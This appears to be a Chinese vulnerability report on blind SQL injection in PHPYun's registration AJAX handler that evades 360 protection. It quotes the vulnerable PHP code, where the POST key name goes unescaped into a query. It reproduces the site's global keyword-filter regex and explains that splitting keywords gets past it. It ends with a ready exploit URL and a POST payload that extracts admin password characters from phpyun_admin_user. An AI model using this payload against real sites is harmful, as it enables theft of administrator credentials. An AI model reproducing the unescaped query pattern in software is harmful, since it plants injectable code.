phpyun注射绕过360防护

漏洞作者: Noxxx

注册时检测会员是否使用问题 model\register.class.php 23 行 [php] function ajax_reg_action(){ $post = array_keys($_POST); $key_name = $post[0]; if($key_name=="username"){ $username=@iconv("utf-8","gbk",$_POST['username']);   if($this->config['sy_uc_type']=="uc_center"){ $this->obj->uc_open(); $user = uc_get_user($username); }else{ $user = $this->obj->DB_select_once("member","`username`='".$username."'"); } if($this->config['sy_regname']!=""){ $regname=@explode(",",$this->config['sy_regname']); if(in_array($username,$regname)){ echo 2;die; } } }else{   #$key_name可控 带入查询 . $user = $this->obj->DB_select_once("member","`".$key_name."`='".$_POST[$key_name]."'"); } if(is_array($user)){echo 1;}else{echo 0;} } [/php]   没有回显只能盲注了. 里面有个全局过滤和360的 360的白名单就行了 全局过滤还是比较坑的 db.safety.php [php] $postfilter = "<.*=(&#\\d+?;?)+?>|<.*data=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\\(\d+?|sleep\s*?\\([\d\.]+?\\)|load_file\s*?\\()|<[^>]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.+?\\*\\/|\\/\\*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?)|UPDATE(\\(.+\\)|\\s+?.+?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?)FROM(\\(.+\\)|\\s+?.+?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)"; [/php] 只要检测文本不连续出现关键词就通过了 底下还有一个过滤值的,不过也没关键词. exp: http://0day5.com/phpyun/?m=register&c=ajax_reg&admin_dir=admin (POST) uid`%26%26(SELECT(MID(password,1,1)%3D'1')FROM/**=**/phpyun_admin_user)%23 (会员表里有数据就行 )   成功返回1 失败返回0 13174855a0b0a0c3e9c75b8cdb644949d8c36331  

漏洞证明:

13172155408b323450c1cb3aa1908c891242bd5d

发表评论